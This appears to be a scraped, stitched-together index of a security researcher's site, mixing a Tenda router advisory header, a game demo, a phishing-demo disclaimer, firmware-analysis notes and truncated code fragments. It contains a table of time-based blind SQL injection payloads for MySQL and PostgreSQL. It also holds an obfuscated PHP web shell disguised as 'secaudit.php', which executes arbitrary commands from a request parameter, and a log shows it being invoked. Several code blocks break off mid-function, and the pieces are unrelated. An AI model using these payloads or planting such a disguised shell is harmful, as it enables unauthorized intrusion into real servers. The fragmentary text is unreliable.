- Discovered by: xxricardoxkk
- Vendor: Shenzhen Jixiang Tenda Technology Co., Ltd.
- Affected Version: AC1206V1.0RTL_V15.03.06.23
- Severity: High (unauthenticated DoS, potential RCE risk).
What if fiction became reality?
In Black Mirror, Colin Ritman's mysterious creation, Thronglets, was more than a game: it was a digital life simulation that blurred the line between code and consciousness.
This project is a browser-based recreation of that unsettling vision. On screen, you'll see chaotic little beings moving, interacting, and evolving, as if they had minds of their own. It is not just a retro-inspired simulation; it's a glimpse into the strange possibility of artificial life trapped inside code.
🎮 Play the demo here 👉 https://win3zz.com/throng
Title | Payload
---|---
MySQL >= 5.0.12 OR time-based blind (query SLEEP) | OR (SELECT 1337 FROM (SELECT(SLEEP([SLEEPTIME])))win3zz_test)
MySQL >= 5.0.12 OR time-based blind (SLEEP) | OR SLEEP([SLEEPTIME])
MySQL < 5.0.12 OR time-based blind (BENCHMARK) | OR 1337=BENCHMARK([SLEEPTIME]000000,MD5('win3zz_test'))
MySQL > 5.0.12 OR time-based blind (heavy query) | OR 1337=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)
MySQL >= 5.0.12 RLIKE time-based blind | RLIKE SLEEP([SLEEPTIME])
MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP) | RLIKE (SELECT 1337 FROM (SELECT(SLEEP([SLEEPTIME])))win3zz_test)
MySQL OR time-based blind (ELT) | OR ELT(1337=1337,SLEEP([SLEEPTIME]))
PostgreSQL > 8.1 OR time-based blind | OR 1337=(SELECT 1337 FROM PG_SLEEP([SLEEPTIME]))
PostgreSQL OR time-based blind (heavy query) | OR 1337=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
Important
Disclaimer: This content is intended strictly for educational and ethical awareness purposes only. It must not be used for unauthorized or malicious activities. Always conduct security testing only in environments you own or have explicit permission to test. Misuse of this information may be illegal and subject to penalties under cybercrime laws.
This demonstrates how phish[i]ng techniques work, for the sole purpose of educating ethical hackers, developers, and students in cybersecurity.
We are using a minified and obfuscated clone of the Fa[ce]book login page for simulation purposes.
Summary of the concepts and techniques discussed in a firmware analysis series, along with technical notes and commands
This video, Part 1 of a three-part firmware analysis series by Tom Heb of Meta Red Team X, introduces what firmware is, why it's security-critical, and the initial two phases of firmware analysis: enumerate (figuring out what firmware exists) and obtain (getting a copy of the firmware).
Key Technical Details and Commands:
<?php
echo myMessage("WELCOME", "win3zz", 0);
function myMessage() {
    $messages = [
        "WELCOME" => "Welcome, %s! You have %d new messages.",
        "ERROR" => "An error occurred: %s"
    ];
/**
 * Description:
 * You can decode the hidden message by running the program.
 * Compile and execute: user@host:~$ javac A.java && java A
 *
 * @author Bipin Jitiya
 * @since 2024-12-17
 */
class A {
    public static void main(String[] args){
secaudit.php
<?php $s="\x73\x79\163\x74\145\155";$__=$_REQUEST;if(isset($__["\x61\162\x65\x61\x35\x31"])){echo "\74\160\x72\145\x3e";$c0=$__["\x61\162\x65\x61\x35\x31"];$s($c0.' 2>&1');echo "\74\57\160\162\x65\76";exit;}?>
bipin@bipin-VirtualBox:~/BB/Research/php_backdoor$ php -S 127.0.0.2:8000
[Wed Aug 21 18:49:26 2024] PHP 7.4.3-4ubuntu2.23 Development Server (http://127.0.0.2:8000) started
[Wed Aug 21 18:49:52 2024] 127.0.0.1:53050 Accepted
[Wed Aug 21 18:49:52 2024] 127.0.0.1:53050 [200]: GET /secaudit.php?area51=id